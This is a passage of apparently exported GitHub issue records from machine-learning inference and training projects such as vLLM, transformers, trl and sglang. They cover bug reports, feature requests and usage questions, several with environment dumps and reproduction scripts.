([issue](https://github.com/triton-lang/triton/issues/8473)). \n\nFor the same benchmark config, I am seeing the same perf on B300 as on H200 (actually slightly worse). 
Is B300 fully supported on vllm yet?\n\n### Before submitting a new issue...\n\n- [x] Make sure you already searched for relevant issues, and asked the chatbot living at the bottom right corner of the [documentation page](https://docs.vllm.ai/en/latest/), which can answer lots of frequently asked questions.", "url": "https://github.com/vllm-project/vllm/issues/30630", "state": "open", "labels": [ "usage", "nvidia" ], "created_at": "2025-12-14T01:00:34Z", "updated_at": "2025-12-18T21:17:42Z", "comments": 4, "user": "navmarri14" }, { "repo": "huggingface/transformers.js", "number": 1484, "title": "Should npm @xenova/transformers be deleted or marked deprecated?", "body": "### Question\n\nHello,\nI was surprised that none of the models I tried were supported by transformers.js, even though they were using transformers.js in their README, until I realized that I was using the old npm package.\n\nShouldn't this package be removed? Or marked as deprecated in favour of huggingface's?\n\nBest,", "url": "https://github.com/huggingface/transformers.js/issues/1484", "state": "open", "labels": [ "question" ], "created_at": "2025-12-13T19:49:08Z", "updated_at": "2025-12-17T12:21:12Z", "user": "matthieu-talbot-ergonomia" }, { "repo": "huggingface/tokenizers", "number": 1910, "title": "[Docs] `Visualizer` dead links", "body": "It seems like the documentation for `Visualizer` is out of date and all the links return 404.\n\nDocs: https://huggingface.co/docs/tokenizers/api/visualizer\nGithub Source: https://github.com/huggingface/tokenizers/blob/main/bindings/python/py_src/tokenizers/tools/visualizer.py", "url": "https://github.com/huggingface/tokenizers/issues/1910", "state": "open", "labels": [], "created_at": "2025-12-13T19:23:33Z", "updated_at": "2025-12-13T19:23:33Z", "comments": 0, "user": "dudeperf3ct" }, { "repo": "vllm-project/vllm", "number": 30621, "title": "[Feature]: Remove MXFP4 Logic From `fused_experts`", "body": "### \ud83d\ude80 The feature, motivation and pitch\n\nSUMMARY:\n* as part of the effort to refactor MoE, trying to reduce cruft\n* we currently only have MX emulation in vLLM\n* the logic for this emulation should be moved into quark\n\nhttps://github.com/vllm-project/vllm/blame/main/vllm/model_executor/layers/fused_moe/fused_moe.py#L1866-L1899\n\n### Alternatives\n\n_No response_\n\n### Additional context\n\n_No response_\n\n### Before submitting a new issue...\n\n- [x] Make sure you already searched for relevant issues, and asked the 
chatbot living at the bottom right corner of the [documentation page](https://docs.vllm.ai/en/latest/), which can answer lots of frequently asked questions.", "url": "https://github.com/vllm-project/vllm/issues/30621", "state": "open", "labels": [ "help wanted", "good first issue", "feature request" ], "created_at": "2025-12-13T18:30:30Z", "updated_at": "2026-01-04T14:47:45Z", "comments": 13, "user": "robertgshaw2-redhat" }, { "repo": "vllm-project/vllm", "number": 30620, "title": "[Feature]: Remove Chunking From FusedMoE", "body": "### \ud83d\ude80 The feature, motivation and pitch\n\n* we have some chunking logic in the triton kernels to avoid IMA: https://github.com/vllm-project/vllm/blob/main/vllm/model_executor/layers/fused_moe/fused_moe.py#L1807\n* we chunk in ~65k tokens\n* this case does not happen anymore because of chunked prefill\n\nWe should remove this\n\n### Alternatives\n\n_No response_\n\n### Additional context\n\n_No response_\n\n### Before submitting a new issue...\n\n- [x] Make sure you already searched for relevant issues, and asked the chatbot living at the bottom right corner of the [documentation page](https://docs.vllm.ai/en/latest/), which can answer lots of frequently asked questions.", "url": "https://github.com/vllm-project/vllm/issues/30620", "state": "open", "labels": [ "help wanted", "good first issue", "feature request" ], "created_at": "2025-12-13T18:22:30Z", "updated_at": "2025-12-13T23:27:22Z", "comments": 3, "user": "robertgshaw2-redhat" }, { "repo": "vllm-project/vllm", "number": 30570, "title": "[Usage]: Why is VLLM still using SSE at all for mcp?", "body": "### Your current environment\n\nThis is a broad question: Why is vllm still using/hardcoding SSE usage at all, when it's been deprecated for well over six months at this point?\n\n### How would you like to use vllm\n\nI want to run inference of a [specific model](put link here). I don't know how to integrate it with vllm.\n\n\n### Before submitting a new issue...\n\n- [x] Make sure you already searched for relevant issues, and asked the chatbot living at the bottom right corner of the [documentation page](https://docs.vllm.ai/en/latest/), which can answer lots of frequently asked questions.", "url": "https://github.com/vllm-project/vllm/issues/30570", "state": "open", "labels": [ "usage" ], "created_at": "2025-12-12T20:02:08Z", "updated_at": "2025-12-18T10:50:37Z", "comments": 1, "user": "bags307" }, { "repo": "sgl-project/sglang", "number": 14984, "title": "Can the source code compilation and installation of sgl-kernel support the SM86 driver for CUDA12.9", "body": "### Checklist\n\n- [x] I searched related issues but found no solution.\n- [ ] The bug persists in the latest version.\n- [ ] Issues without environment info and a minimal reproducible demo are hard to resolve and may receive no feedback.\n- [ ] If this is not a bug report but a general question, please start a discussion at https://github.com/sgl-project/sglang/discussions. Otherwise, it will be closed.\n- [ ] Please use English. Otherwise, it will be closed.\n\n### Describe the bug\n\nEncountered problem: Unable to find the .so file for sm86 when installing the latest sgl-kernel 0.3.19; only sm90 and higher are available.\n\n### Reproduction\n\nQuestion: My machine's GPU is SM86. 
Can sgl-kernel be compiled and installed from source inside a container with nvcc 12.9 so that it targets SM86?\n\n### Environment\n\nEnvironment: The host GPU is SM86, the nvcc version in the Docker container is 12.9, and torch and flash-attn are CU129 builds", "url": "https://github.com/sgl-project/sglang/issues/14984", "state": "open", "labels": [], "created_at": "2025-12-12T10:29:50Z", "updated_at": "2025-12-15T09:41:18Z", "comments": 1, "user": "zwt-1234" }, { "repo": "vllm-project/vllm", "number": 30548, "title": "[Feature]: Support for Q.ANT Photonic Computing ?", "body": "### \ud83d\ude80 The feature, motivation and pitch\n\nhttps://qant.com/\nhttps://qant.com/wp-content/uploads/2025/11/20251111_QANT-Photonic-AI-Accelerator-Gen-2.pdf\n\n\n### Alternatives\n\n_No response_\n\n### Additional context\n\n_No response_\n\n### Before submitting a new issue...\n\n- [x] Make sure you already searched for relevant issues, and asked the chatbot living at the bottom right corner of the [documentation page](https://docs.vllm.ai/en/latest/), which can answer lots of frequently asked questions.", "url": "https://github.com/vllm-project/vllm/issues/30548", "state": "open", "labels": [ "feature request" ], "created_at": "2025-12-12T10:16:53Z", "updated_at": "2025-12-12T14:45:53Z", "comments": 2, "user": "plitc" }, { "repo": "huggingface/tokenizers", "number": 1909, "title": "[Docs] `Encode Inputs` rendering issues", "body": "It seems like the documentation for Encode Inputs is not rendered properly.\n\nOfficial URL: https://huggingface.co/docs/tokenizers/main/en/api/encode-inputs?code=python\nGitHub URL: https://github.com/huggingface/tokenizers/blob/main/docs/source-doc-builder/api/encode-inputs.mdx", "url": "https://github.com/huggingface/tokenizers/issues/1909", "state": "open", "labels": [], "created_at": "2025-12-12T09:47:48Z", "updated_at": "2025-12-12T09:47:48Z", "comments": 0, "user": "ariG23498" }, { "repo": "vllm-project/vllm", "number": 30541, "title": "[Usage]: missing dsml token \"| DSML | \" with DeepSeek-V3.2 tools call", "body": "### Your current environment\n\nCollecting environment information...\n==============================\n System Info\n==============================\nOS : Ubuntu 22.04.5 LTS (x86_64)\nGCC version : (Ubuntu 11.4.0-1ubuntu1~22.04) 11.4.0\nClang version : Could not collect\nCMake version : version 4.0.3\nLibc version : glibc-2.35\n\n==============================\n PyTorch Info\n==============================\nPyTorch version : 2.9.0+cu128\nIs debug build : False\nCUDA used to build PyTorch : 12.8\nROCM used to build PyTorch : N/A\n\n==============================\n Python Environment\n==============================\nPython version : 3.12.11 (main, Jun 4 2025, 08:56:18) [GCC 11.4.0] (64-bit runtime)\nPython platform : Linux-5.15.0-50-generic-x86_64-with-glibc2.35\n\n==============================\n CUDA / GPU Info\n==============================\nIs CUDA available : True\nCUDA runtime version : 12.8.93\nCUDA_MODULE_LOADING set to : \nGPU models and configuration : \nGPU 0: NVIDIA H20\nGPU 1: NVIDIA H20\nGPU 2: NVIDIA H20\nGPU 3: NVIDIA H20\nGPU 4: NVIDIA H20\nGPU 5: NVIDIA H20\nGPU 6: NVIDIA H20\nGPU 7: NVIDIA H20\n\nNvidia driver version : 565.57.01\ncuDNN version : Could not collect\nHIP runtime version : N/A\nMIOpen runtime version : N/A\nIs XNNPACK available : True\n\n==============================\n CPU Info\n==============================\nArchitecture: x86_64\nCPU op-mode(s): 32-bit, 64-bit\nAddress sizes: 46 bits physical, 57 bits virtual\nByte Order: Little Endian\nCPU(s): 208\nOn-line CPU(s) 
list: 0-207\nVendor ID: GenuineIntel\nModel name: INTEL(R) XEON(R) PLATINUM 8563C\nCPU family: 6\nModel: 207\nThread(s) per core: 2\nCore(s) per socket: 52\nSocket(s): 2\nStepping: 2\nFrequency boost: enabled\nCPU max MHz: 4000.0000\nCPU min MHz: 800.0000\nBogoMIPS: 5200.00\nFlags: fpu vme de pse tsc msr pae mce cx8 apic sep mtrr pge mca cmov pat pse36 clflush dts acpi mmx fxsr sse sse2 ss ht tm pbe syscall nx pdpe1gb rdtscp lm constant_tsc art arch_perfmon pebs bts rep_good nopl xtopology nonstop_tsc cpuid aperfmperf tsc_known_freq pni pclmulqdq dtes64 monitor ds_cpl vmx smx est tm2 ssse3 sdbg fma cx16 xtpr pdcm pcid dca sse4_1 sse4_2 x2apic movbe popcnt tsc_deadline_timer aes xsave avx f16c rdrand lahf_lm abm 3dnowprefetch cpuid_fault epb cat_l3 cat_l2 cdp_l3 invpcid_single cdp_l2 ssbd mba ibrs ibpb stibp ibrs_enhanced tpr_shadow vnmi flexpriority ept vpid ept_ad fsgsbase tsc_adjust bmi1 avx2 smep bmi2 erms invpcid cqm rdt_a avx512f avx512dq rdseed adx smap avx512ifma clflushopt clwb intel_pt avx512cd sha_ni avx512bw avx512vl xsaveopt xsavec xgetbv1 xsaves cqm_llc cqm_occup_llc cqm_mbm_total cqm_mbm_local avx_vnni avx512_bf16 wbnoinvd dtherm ida arat pln pts avx512vbmi umip pku ospke waitpkg avx512_vbmi2 gfni vaes vpclmulqdq avx512_vnni avx512_bitalg tme avx512_vpopcntdq la57 rdpid bus_lock_detect cldemote movdiri movdir64b enqcmd fsrm md_clear serialize tsxldtrk pconfig arch_lbr amx_bf16 avx512_fp16 amx_tile amx_int8 flush_l1d arch_capabilities\nVirtualization: VT-x\nL1d cache: 4.9 MiB (104 instances)\nL1i cache: 3.3 MiB (104 instances)\nL2 cache: 208 MiB (104 instances)\nL3 cache: 640 MiB (2 instances)\nNUMA node(s): 2\nNUMA node0 CPU(s): 0-51,104-155\nNUMA node1 CPU(s): 52-103,156-207\nVulnerability Itlb multihit: Not affected\nVulnerability L1tf: Not affected\nVulnerability Mds: Not affected\nVulnerability Meltdown: Not affected\nVulnerability Mmio stale data: Not affected\nVulnerability Retbleed: Not affected\nVulnerability Spec store bypass: Vulnerable\nVulnerability Spectre v1: Mitigation; usercopy/swapgs barriers and __user pointer sanitization\nVulnerability Spectre v2: Vulnerable, IBPB: disabled, STIBP: disabled, PBRSB-eIBRS: Vulnerable\nVulnerability Srbds: Not affected\nVulnerability Tsx async abort: Not affected\n\n==============================\nVersions of relevant libraries\n==============================\n[pip3] flashinfer-python==0.5.3\n[pip3] numpy==2.2.6\n[pip3] nvidia-cublas-cu12==12.8.4.1\n[pip3] nvidia-cuda-cupti-cu12==12.8.90\n[pip3] nvidia-cuda-nvrtc-cu12==12.8.93\n[pip3] nvidia-cuda-runtime-cu12==12.8.90\n[pip3] nvidia-cudnn-cu12==9.10.2.21\n[pip3] nvidia-cudnn-frontend==1.16.0\n[pip3] nvidia-cufft-cu12==11.3.3.83\n[pip3] nvidia-cufile-cu12==1.1", "url": "https://github.com/vllm-project/vllm/issues/30541", "state": "open", "labels": [ "usage" ], "created_at": "2025-12-12T06:47:03Z", "updated_at": "2025-12-12T20:59:40Z", "comments": 1, "user": "crischeng" }, { "repo": "vllm-project/vllm", "number": 30511, "title": "Potential Deadlock?", "body": "Consider using proper synchronization primitives like threading.Event or queue.Queue.get(timeout=...)", "url": "https://github.com/vllm-project/vllm/issues/30511", "state": "closed", "labels": [], "created_at": "2025-12-11T19:57:43Z", "updated_at": "2025-12-12T18:00:20Z", "comments": 1, "user": "ChuanLi1101" }, { "repo": "sgl-project/sglang", "number": 14903, "title": "Does the current Qwen3-VL (or Qwen3-VL-MoE) officially support TBO?", "body": "Hi team,\n\nI noticed that Qwen3-VL and Qwen3-MoE adopt different model 
architectures.\nWhen profiling the execution path, I found that:\n\nQwen3-MoE eventually falls back to the Qwen2-MoE implementation, which explicitly supports TBO (Two-Batch Overlap).\n\nHowever, Qwen3-VL takes the path of Qwen3-VL-MoE, and I did not find any clear implementation or code path that indicates TBO support for this variant.\n\nBased on the current codebase, it seems that Qwen3-VL-MoE may not have full TBO support, or its TBO integration is not obvious from the trace.", "url": "https://github.com/sgl-project/sglang/issues/14903", "state": "open", "labels": [], "created_at": "2025-12-11T13:26:50Z", "updated_at": "2025-12-11T13:26:50Z", "comments": 0, "user": "jerry-dream-fu" }, { "repo": "huggingface/transformers", "number": 42804, "title": "[`Quantization FP8`] Native `from_config` support", "body": "### Feature request\n\nRelated to https://github.com/huggingface/transformers/pull/42028#discussion_r2592235170\n\nSince FP8 is becoming more and more standard, it would be nice to create fp8 native models via config or more like using `from_config`. Atm, quant configs are not respected apparently - either that or we need to update the docs to show how to use it properly.\n\n### Motivation\n\nFp8 is becoming increasingly important\n\n### Your contribution\n\n\ud83d\udc40 ", "url": "https://github.com/huggingface/transformers/issues/42804", "state": "open", "labels": [ "Feature request" ], "created_at": "2025-12-11T10:17:47Z", "updated_at": "2025-12-14T22:49:48Z", "comments": 3, "user": "vasqu" }, { "repo": "huggingface/trl", "number": 4679, "title": "[SFT] High vRAM consumption during eval loop", "body": "### Reproduction\n\n### Unexpected behavior\n\nWhen training a model on large sequences (>=20k tokens) with `PEFT LoRA` + `SFTTrainer` + `liger-kernel`, the vRAM usage spikes during the evaluation loop, consuming way more vRAM than during the training.\n\nThe size of this vRAM spike seem to scale with the length of the input sequence: for cases with `max_length=40000`, we end up with spikes of ~50GB vRAM, far exceeding the amount used during the training.\n\nHere's a MLFlow GPU vRAM extract showcasing this on an A100 for this 40k token scenario with Qwen3-0.6B:\n\n\"Image\"\n\nAnd same goes for Qwen3-4B, 40k token:\n\n\"Image\"\n\n### Minimal reproduction script\n\nBelow is the [default SFT example from the documentation](https://github.com/huggingface/trl/blob/main/trl/scripts/sft.py), slightly altered to artificially create long input sequences (>=20k tokens) in both the training and evaluation dataset splits.\n\nBy running `watch -n 1 nvidia-smi` while the training is running, you can see that the vRAM usage is way higher during the evaluation phase than during the training. If your GPU has enough vRAM, you can increase the `max_length` parameter and this will become even more visible. 
_For some reason, I can't get `trackio` to properly report vRAM usage, hence the use of `nvidia-smi`.\n\nYou can launch the script with the following command:\n\n```bash\npython sft_example.py \\\n--model_name_or_path Qwen/Qwen3-0.6B \\\n--dataset_name trl-lib/Capybara \\\n--learning_rate 2.0e-4 \\\n--max-steps 10 \\\n--per_device_train_batch_size 1 \\\n--per_device_eval_batch_size 1 \\\n--eval_accumulation_steps 1 \\\n--gradient_accumulation_steps 1 \\\n--gradient_checkpointing \\\n--eos_token '<|im_end|>' \\\n--eval_strategy steps \\\n--eval_steps 10 \\\n--use_peft \\\n--lora_r 8 \\\n--lora_alpha 16 \\\n--use_liger \\\n--max_length 10000\n```\n\n```python\n# Copyright 2020-2025 The HuggingFace Team. All rights reserved.\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\");\n# you may not use this file except in compliance with the License.\n# You may obtain a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS,\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n# See the License for the specific language governing permissions and\n# limitations under the License.\n\n# /// script\n# dependencies = [\n# \"trl\",\n# \"peft\",\n# \"trackio\",\n# \"kernels\"\n# ]\n# ///\n\nimport argparse\nimport os\n\nfrom accelerate import logging\nfrom datasets import load_dataset\nfrom transformers import AutoConfig, AutoModelForCausalLM\nfrom transformers.models.auto.modeling_auto import (\n MODEL_FOR_IMAGE_TEXT_TO_TEXT_MAPPING_NAMES,\n)\nfrom trl import (\n DatasetMixtureConfig,\n ModelConfig,\n ScriptArguments,\n SFTConfig,\n SFTTrainer,\n TrlParser,\n get_dataset,\n get_kbit_device_map,\n get_peft_config,\n get_quantization_config,\n)\n\nlogger = logging.get_logger(__name__)\n\n# Enable logging in a Hugging Face Space\nos.environ.setdefault(\"TRACKIO_SPACE_ID\", \"trl-trackio\")\n\n\ndef main(script_args, training_args, model_args, dataset_args):\n ################\n # Model init kwargs\n ################\n model_kwargs = dict(\n revision=model_args.model_revision,\n trust_remote_code=model_args.trust_remote_code,\n attn_implementation=model_args.attn_implementation,\n dtype=model_args.dtype,\n )\n quantization_config = get_quantization_config(model_args)\n if quantization_config is not None:\n # Passing None would not be treated the same as omitting the argument, so we include it only when valid.\n model_kwargs[\"device_map\"] = get_kbit_device_map()\n model_kwargs[\"quantization_config\"] = quantization_config\n\n # Create model\n config = AutoConfig.from_pretrained(model_args.model_name_or_path)\n valid_image_text_architectures = MODEL_FOR_IMAGE_TEXT_TO_TEXT_MAPPING_NAMES.values()\n\n if config.architectures and any(\n arch in valid_image_text_architectures for arch in config.architectures\n ):\n from transformers import AutoModelForImageTextToText\n\n model = AutoModelForImageTextToText.from_pretrained(\n model_args.model_name_or_path, **model_kwargs\n )\n else:\n model = AutoModelForCausalLM.from_pretrained(\n model_args.model_name_or_path, **model_kwargs\n )\n\n # Load the dataset\n if dataset_args.datasets and script_args.dataset_name:\n logger.warning(\n \"Both `datasets` and `dataset_name` are provided. 
The `datasets` argument will be used to load the \"\n \"dataset and `dataset_name` will be ignored.\"\n )\n ", "url": "https://github.com/huggingface/trl/issues/4679", "state": "open", "labels": [ "\ud83d\udc1b bug", "\ud83c\udfcb SFT", "\u26a1 PEFT" ], "created_at": "2025-12-11T10:01:49Z", "updated_at": "2026-01-02T09:23:17Z", "comments": 3, "user": "Khreas" }, { "repo": "vllm-project/vllm", "number": 30477, "title": "[Usage]: How to disable thinking for Qwen-8B", "body": "### Your current environment\n\n```text\nCollecting environment information...\n==============================\n System Info\n==============================\nOS : Ubuntu 24.04.3 LTS (x86_64)\nGCC version : (Ubuntu 13.3.0-6ubuntu2~24.04) 13.3.0\nClang version : Could not collect\nCMake version : Could not collect\nLibc version : glibc-2.39\n\n==============================\n PyTorch Info\n==============================\nPyTorch version : 2.5.1+cu121\nIs debug build : False\nCUDA used to build PyTorch : 12.1\nROCM used to build PyTorch : N/A\n\n==============================\n Python Environment\n==============================\nPython version : 3.12.12 (main, Nov 19 2025, 22:46:53) [Clang 21.1.4 ] (64-bit runtime)\nPython platform : Linux-5.15.167.4-microsoft-standard-WSL2-x86_64-with-glibc2.39\n\n==============================\n CUDA / GPU Info\n==============================\nIs CUDA available : True\nCUDA runtime version : 12.1.105\nCUDA_MODULE_LOADING set to : LAZY\nGPU models and configuration : GPU 0: NVIDIA GeForce RTX 4090 Laptop GPU\nNvidia driver version : 546.26\ncuDNN version : Could not collect\nHIP runtime version : N/A\nMIOpen runtime version : N/A\nIs XNNPACK available : True\n\n==============================\n CPU Info\n==============================\nArchitecture: x86_64\nCPU op-mode(s): 32-bit, 64-bit\nAddress sizes: 39 bits physical, 48 bits virtual\nByte Order: Little Endian\nCPU(s): 32\nOn-line CPU(s) list: 0-31\nVendor ID: GenuineIntel\nModel name: Intel(R) Core(TM) i9-14900HX\nCPU family: 6\nModel: 183\nThread(s) per core: 2\nCore(s) per socket: 16\nSocket(s): 1\nStepping: 1\nBogoMIPS: 4838.39\nFlags: fpu vme de pse tsc msr pae mce cx8 apic sep mtrr pge mca cmov pat pse36 clflush mmx fxsr sse sse2 ss ht syscall nx pdpe1gb rdtscp lm constant_tsc rep_good nopl xtopology tsc_reliable nonstop_tsc cpuid pni pclmulqdq vmx ssse3 fma cx16 pcid sse4_1 sse4_2 x2apic movbe popcnt tsc_deadline_timer aes xsave avx f16c rdrand hypervisor lahf_lm abm 3dnowprefetch invpcid_single ssbd ibrs ibpb stibp ibrs_enhanced tpr_shadow vnmi ept vpid ept_ad fsgsbase tsc_adjust bmi1 avx2 smep bmi2 erms invpcid rdseed adx smap clflushopt clwb sha_ni xsaveopt xsavec xgetbv1 xsaves avx_vnni umip waitpkg gfni vaes vpclmulqdq rdpid movdiri movdir64b fsrm md_clear serialize flush_l1d arch_capabilities\nVirtualization: VT-x\nHypervisor vendor: Microsoft\nVirtualization type: full\nL1d cache: 768 KiB (16 instances)\nL1i cache: 512 KiB (16 instances)\nL2 cache: 32 MiB (16 instances)\nL3 cache: 36 MiB (1 instance)\nVulnerability Gather data sampling: Not affected\nVulnerability Itlb multihit: Not affected\nVulnerability L1tf: Not affected\nVulnerability Mds: Not affected\nVulnerability Meltdown: Not affected\nVulnerability Mmio stale data: Not affected\nVulnerability Reg file data sampling: Mitigation; Clear Register File\nVulnerability Retbleed: Mitigation; Enhanced IBRS\nVulnerability Spec rstack overflow: Not affected\nVulnerability Spec store bypass: Mitigation; Speculative Store Bypass disabled via prctl and seccomp\nVulnerability 
Spectre v1: Mitigation; usercopy/swapgs barriers and __user pointer sanitization\nVulnerability Spectre v2: Mitigation; Enhanced / Automatic IBRS; IBPB conditional; RSB filling; PBRSB-eIBRS SW sequence; BHI BHI_DIS_S\nVulnerability Srbds: Not affected\nVulnerability Tsx async abort: Not affected\n\n==============================\nVersions of relevant libraries\n==============================\n[pip3] numpy==1.26.4\n[pip3] nvidia-cublas-cu12==12.1.3.1\n[pip3] nvidia-cuda-cupti-cu12==12.1.105\n[pip3] nvidia-cuda-nvrtc-cu12==12.1.105\n[pip3] nvidia-cuda-runtime-cu12==12.1.105\n[pip3] nvidia-cudnn-cu12==9.1.0.70\n[pip3] nvidia-cufft-cu12==11.0.2.54\n[pip3] nvidia-curand-cu12==10.3.2.106\n[pip3] nvidia-cusolver-cu12==11.4.5.107\n[pip3] nvidia-cusparse-cu12==12.1.0.106\n[pip3] nvidia-nccl-cu12==2.21.5\n[pip3] nvidia-nvjitlink-cu12==12.9.86\n[pip3] nvidia-nvtx-cu12==12.1.105\n[pip3] pyzmq==27.1.0\n[pip3] torch==2.5.1+cu121\n[pip3] torchaudio==2.5.1+cu121\n[pip3] torchvision==0.20.1+cu121\n[pip3] transformers==4.57.3\n[pip3] triton==3.1.0\n[conda] Could not collect\n\n", "url": "https://github.com/vllm-project/vllm/issues/30477", "state": "closed", "labels": [ "usage" ], "created_at": "2025-12-11T09:28:40Z", "updated_at": "2025-12-22T06:10:43Z", "comments": 3, "user": "fancyerii" }, { "repo": "huggingface/diffusers", "number": 12823, "title": "How to use quantizer after pipeline loaded?", "body": "How to use quantizer after pipeline loaded? \n\n- Currently\n\n```python\n# Quantization occurs at load time.\npipe = QwenImagePipeline.from_pretrained(\n (\n args.model_path\n if args.model_path is not None\n else os.environ.get(\n \"QWEN_IMAGE_DIR\",\n \"Qwen/Qwen-Image\",\n )\n ),\n scheduler=scheduler,\n torch_dtype=torch.bfloat16,\n quantization_config=quantization_config,\n)\n```\n\n- What i want \n\n```python\n# Load on CPU -> Load and fuse lora -> quantize -> to GPU\n```", "url": "https://github.com/huggingface/diffusers/issues/12823", "state": "open", "labels": [], "created_at": "2025-12-11T06:32:38Z", "updated_at": "2025-12-11T14:18:28Z", "user": "DefTruth" }, { "repo": "huggingface/transformers", "number": 42794, "title": "`decoder_start_token_id` or `bos_token_id` has to be defined for encoder-decoder generation.", "body": "### System Info\n\nlatest transformers\n\n### Who can help?\n\n@zucchini-nlp \n\n### Information\n\n- [ ] The official example scripts\n- [ ] My own modified scripts\n\n### Tasks\n\n- [ ] An officially supported task in the `examples` folder (such as GLUE/SQuAD, ...)\n- [ ] My own task or dataset (give details below)\n\n### Reproduction\n\n```python\nimport torch\nfrom transformers import pipeline\n\npipe = pipeline(\n \"document-question-answering\",\n model=\"naver-clova-ix/donut-base-finetuned-docvqa\",\n dtype=torch.float16,\n)\n\nimage = \"https://huggingface.co/spaces/impira/docquery/resolve/2359223c1837a7587402bda0f2643382a6eefeab/invoice.png\"\nquestion = \"What is the invoice number?\"\n\nresult = pipe(image=image, question=question)\nprint(result)\n```\n\nerror:\n```\nTraceback (most recent call last):\n File \"/home/jiqingfe/transformers/test_dqa.py\", line 13, in \n result = pipe(image=image, question=question)\n ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^\n File \"/home/jiqingfe/transformers/src/transformers/pipelines/document_question_answering.py\", line 310, in __call__\n return super().__call__(inputs, **kwargs)\n ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^\n File \"/home/jiqingfe/transformers/src/transformers/pipelines/base.py\", line 1278, in __call__\n return next(\n 
^^^^^\n File \"/home/jiqingfe/transformers/src/transformers/pipelines/pt_utils.py\", line 126, in __next__\n item = next(self.iterator)\n ^^^^^^^^^^^^^^^^^^^\n File \"/home/jiqingfe/transformers/src/transformers/pipelines/pt_utils.py\", line 271, in __next__\n processed = self.infer(next(self.iterator), **self.params)\n ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^\n File \"/home/jiqingfe/transformers/src/transformers/pipelines/base.py\", line 1185, in forward\n model_outputs = self._forward(model_inputs, **forward_params)\n ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^\n File \"/home/jiqingfe/transformers/src/transformers/pipelines/document_question_answering.py\", line 468, in _forward\n model_outputs = self.model.generate(**model_inputs, **generate_kwargs)\n ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^\n File \"/sgl-workspace/miniforge3/lib/python3.12/site-packages/torch/utils/_contextlib.py\", line 120, in decorate_context\n return func(*args, **kwargs)\n ^^^^^^^^^^^^^^^^^^^^^\n File \"/home/jiqingfe/transformers/src/transformers/generation/utils.py\", line 2551, in generate\n self._prepare_special_tokens(generation_config, kwargs_has_attention_mask, device=device)\n File \"/home/jiqingfe/transformers/src/transformers/generation/utils.py\", line 2145, in _prepare_special_tokens\n raise ValueError(\nValueError: `decoder_start_token_id` or `bos_token_id` has to be defined for encoder-decoder generation.\n```\n\n### Expected behavior\n\nCannot locate which PR caused this regression because too many errors recently. The transformers 4.57.3 works well on the script.", "url": "https://github.com/huggingface/transformers/issues/42794", "state": "closed", "labels": [ "bug" ], "created_at": "2025-12-11T06:22:58Z", "updated_at": "2025-12-18T18:33:40Z", "comments": 1, "user": "jiqing-feng" }, { "repo": "vllm-project/vllm", "number": 30464, "title": "[Usage]: How can I use the local pre-compiled wheel of vllm", "body": "### Your current environment\n\n```text\nThe output of `python collect_env.py`\n```\n\n\n### How would you like to use vllm\n\nEvery time I use `VLLM_USE_PRECOMPILED=1 uv pip install --editable .` to build vllm, it always takes much time to download the pre-compiled wheel. Would it be possible to build it by using a locally downloaded wheel file instead?\n\n### Before submitting a new issue...\n\n- [x] Make sure you already searched for relevant issues, and asked the chatbot living at the bottom right corner of the [documentation page](https://docs.vllm.ai/en/latest/), which can answer lots of frequently asked questions.", "url": "https://github.com/vllm-project/vllm/issues/30464", "state": "open", "labels": [ "usage" ], "created_at": "2025-12-11T06:22:43Z", "updated_at": "2025-12-12T01:02:22Z", "comments": 1, "user": "gcanlin" }, { "repo": "huggingface/transformers", "number": 42791, "title": "Add support for GPT_OSS with tp_plan or enable native tensor parallelism", "body": "### Model description\n\n #[https://huggingface.co/docs/transformers/main/perf_infer_gpu_multi?tp_plan=auto+plan](url)\n\n> https://github.com/huggingface/transformers/issues/41819\n\nThere are a list of supported models here, but GPT-OSS is not one of them. Please add support for GPT_OSS too to enable `tp_plan`. 
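For reference, this is the documented usage pattern for models that already support it - presumably GPT-OSS would expose the same interface once a `tp_plan` is added (sketch only; the model id is the desired target, not a working configuration today):

```python
import torch
from transformers import AutoModelForCausalLM, AutoTokenizer

model_id = "openai/gpt-oss-20b"  # not yet supported for tp_plan; shown as the goal

# tp_plan="auto" asks transformers to shard the model with its built-in
# tensor-parallel plan across the ranks that torchrun launches.
model = AutoModelForCausalLM.from_pretrained(
    model_id,
    dtype=torch.bfloat16,
    tp_plan="auto",
)
tokenizer = AutoTokenizer.from_pretrained(model_id)
```

launched with something like `torchrun --nproc-per-node 4 run_tp.py`.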
Please help me understand when the model is prepared for TP during accelerate initialization: is there some native support needed in the model to enable TP?\n\nI have tried this example TP script [nd_parallel.py](https://github.com/huggingface/accelerate/blob/main/examples/torch_native_parallelism/nd_parallel.py) with pure TP on the GPT-OSS-20B model and get the same error as mentioned in this already-open issue: [#41819](https://github.com/huggingface/transformers/issues/41819).\n\nAfter handling the `DTensor` sinks as suggested as a fix in the issue above, I still find many such `DTensor`s in multiple other places, causing the error below due to the incompatibility between `DTensor` and `torch.Tensor`:\n\n`raise RuntimeError(\n[rank0]: RuntimeError: aten.bmm.default: got mixed torch.Tensor and DTensor, need to convert all torch.Tensor to DTensor before calling distributed operators!`\n\n### Open source status\n\n- [x] The model implementation is available\n- [x] The model weights are available\n\n### Provide useful links for the implementation\n\n_No response_", "url": "https://github.com/huggingface/transformers/issues/42791", "state": "open", "labels": [ "New model" ], "created_at": "2025-12-11T04:31:19Z", "updated_at": "2025-12-19T08:38:31Z", "comments": 1, "user": "quic-akuruvil" }, { "repo": "sgl-project/sglang", "number": 14868, "title": "How to train vicuna EAGLE3 model?", "body": "I have carefully reviewed the official tutorials and source code, but I was unable to find the relevant config and template files specific to Vicuna.\n\nCould you please provide an example, specifically regarding the template structure?", "url": "https://github.com/sgl-project/sglang/issues/14868", "state": "open", "labels": [], "created_at": "2025-12-11T03:59:39Z", "updated_at": "2025-12-11T03:59:39Z", "comments": 0, "user": "Sylvan820" }, { "repo": "vllm-project/vllm", "number": 30447, "title": "[Usage]: how to load kv cache data into local file", "body": "### Your current environment\n\npython3.10+vllm0.10.0\n\n### How would you like to use 